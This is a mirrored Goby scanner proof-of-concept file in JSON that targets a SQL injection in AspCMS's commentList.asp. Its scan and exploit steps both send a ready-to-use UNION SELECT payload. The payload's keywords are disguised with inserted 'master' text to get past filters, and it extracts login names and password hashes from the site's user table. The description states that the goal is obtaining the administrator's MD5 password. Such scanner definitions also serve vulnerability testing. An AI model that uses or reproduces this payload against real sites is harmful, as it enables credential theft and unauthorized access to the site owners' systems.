mirror of https://github.com/qwqdanchun/Goby.git
103 lines
4.0 KiB
JSON
103 lines
4.0 KiB
JSON
|
{
|
|||
|
|
"Name": "AspCMS commentList.asp SQL注入漏洞",
|
|||
|
|
"Level": "3",
|
|||
|
|
"Tags": [
|
|||
|
|
"sqli"
|
|||
|
|
],
|
|||
|
|
"GobyQuery": "app=\"ASPCMS\"",
|
|||
|
|
"Description": "AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码",
|
|||
|
|
"Product": "AspCMS",
|
|||
|
|
"Homepage": "https://gobies.org/",
|
|||
|
|
"Author": "gobysec@gmail.com",
|
|||
|
|
"Impact": "",
|
|||
|
|
"Recommendation": "",
|
|||
|
|
"References": [
|
|||
|
|
"https://gobies.org/"
|
|||
|
|
],
|
|||
|
|
"HasExp": true,
|
|||
|
|
"ExpParams": null,
|
|||
|
|
"ExpTips": {
|
|||
|
|
"Type": "",
|
|||
|
|
"Content": ""
|
|||
|
|
},
|
|||
|
|
"ScanSteps": [
|
|||
|
|
"AND",
|
|||
|
|
{
|
|||
|
|
"Request": {
|
|||
|
|
"method": "GET",
|
|||
|
|
"uri": "/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user",
|
|||
|
|
"follow_redirect": true,
|
|||
|
|
"header": {
|
|||
|
|
"User-Agent": "Mozilla/5.0(X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0"
|
|||
|
|
},
|
|||
|
|
"data_type": "text",
|
|||
|
|
"data": "",
|
|||
|
|
"set_variable": []
|
|||
|
|
},
|
|||
|
|
"ResponseTest": {
|
|||
|
|
"type": "group",
|
|||
|
|
"operation": "AND",
|
|||
|
|
"checks": [
|
|||
|
|
{
|
|||
|
|
"type": "item",
|
|||
|
|
"variable": "$code",
|
|||
|
|
"operation": "==",
|
|||
|
|
"value": "200",
|
|||
|
|
"bz": ""
|
|||
|
|
},
|
|||
|
|
{
|
|||
|
|
"type": "item",
|
|||
|
|
"variable": "$body",
|
|||
|
|
"operation": "contains",
|
|||
|
|
"value": "admin",
|
|||
|
|
"bz": ""
|
|||
|
|
}
|
|||
|
|
]
|
|||
|
|
},
|
|||
|
|
"SetVariable": [
|
|||
|
|
"output|lastbody|regex|"
|
|||
|
|
]
|
|||
|
|
}
|
|||
|
|
],
|
|||
|
|
"ExploitSteps": [
|
|||
|
|
"AND",
|
|||
|
|
{
|
|||
|
|
"Request": {
|
|||
|
|
"method": "GET",
|
|||
|
|
"uri": "/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user",
|
|||
|
|
"follow_redirect": true,
|
|||
|
|
"header": {
|
|||
|
|
"User-Agent": "Mozilla/5.0(X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0"
|
|||
|
|
},
|
|||
|
|
"data_type": "text",
|
|||
|
|
"data": "",
|
|||
|
|
"set_variable": []
|
|||
|
|
},
|
|||
|
|
"ResponseTest": {
|
|||
|
|
"type": "group",
|
|||
|
|
"operation": "AND",
|
|||
|
|
"checks": [
|
|||
|
|
{
|
|||
|
|
"type": "item",
|
|||
|
|
"variable": "$code",
|
|||
|
|
"operation": "==",
|
|||
|
|
"value": "200",
|
|||
|
|
"bz": ""
|
|||
|
|
},
|
|||
|
|
{
|
|||
|
|
"type": "item",
|
|||
|
|
"variable": "$body",
|
|||
|
|
"operation": "contains",
|
|||
|
|
"value": "admin",
|
|||
|
|
"bz": ""
|
|||
|
|
}
|
|||
|
|
]
|
|||
|
|
},
|
|||
|
|
"SetVariable": [
|
|||
|
|
"output|lastbody|regex|"
|
|||
|
|
]
|
|||
|
|
}
|
|||
|
|
],
|
|||
|
|
"PostTime": "2022-06-01 21:42:35",
|
|||
|
|
"GobyVersion": "1.9.325"
|
|||
|
|
}
|